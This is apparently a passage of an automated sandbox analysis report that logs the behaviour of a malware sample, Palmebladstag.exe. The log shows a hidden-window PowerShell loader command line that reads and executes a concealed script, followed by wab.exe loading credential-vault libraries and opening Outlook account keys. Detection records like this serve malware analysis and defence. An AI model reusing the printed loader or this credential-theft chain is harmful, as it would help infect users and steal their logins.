              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: resiniferous.lnk.0.drLNK file: ..\AppData\Local\Microsoft\Windows\INetCache\grdtes\timotegrsset.uti
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile written: C:\Users\user\inputed.iniJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: Binary string: System.Core.pdb73-B396-481F-9042-AD358843EC24 source: powershell.exe, 00000002.00000002.3053027455.0000000006EF9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000002.00000002.3048447609.000000000299A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb$ source: powershell.exe, 00000002.00000002.3055743632.0000000007FD2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.3055743632.0000000007FE9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.3053027455.0000000006E35000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.3055536411.0000000007F86000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000002.00000002.3056196109.000000000BE0A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((leaseholds $Womenkind $Trmlkspulverets), (Afkorterens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Interests = [AppDomain]::CurrentDomain.GetAssemblies(
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($overtalelsesevnen)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Uvirkelighedens, $false).DefineType($St
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne)
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne)Jump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeCode function: 0_2_00405EA2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EA2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_043229A1 push cs; retf 2_2_043229A2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0704AD06 pushfd ; ret 2_2_0704AD11
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_24392806 push ecx; ret 9_2_24392819
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044693D push ecx; ret 10_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00451D54 push eax; ret 10_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044B090 push eax; ret 11_2_0044B0A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044B090 push eax; ret 11_2_0044B0CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00451D34 push eax; ret 11_2_00451D41
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00444E71 push ecx; ret 11_2_00444E81
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00414060 push eax; ret 12_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00414060 push eax; ret 12_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00414039 push ecx; ret 12_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004164EB push 0000006Ah; retf 12_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00416553 push 0000006Ah; retf 12_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00416555 push 0000006Ah; retf 12_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_004047CB
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5580Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4254Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.5 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5840Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5560Thread sleep count: 39 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\Palmebladstag.exeCode function: 0_2_0040264F FindFirstFileA,0_2_0040264F
              Source: C:\Users\user\Desktop\Palmebladstag.exeCode function: 0_2_00405454 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405454
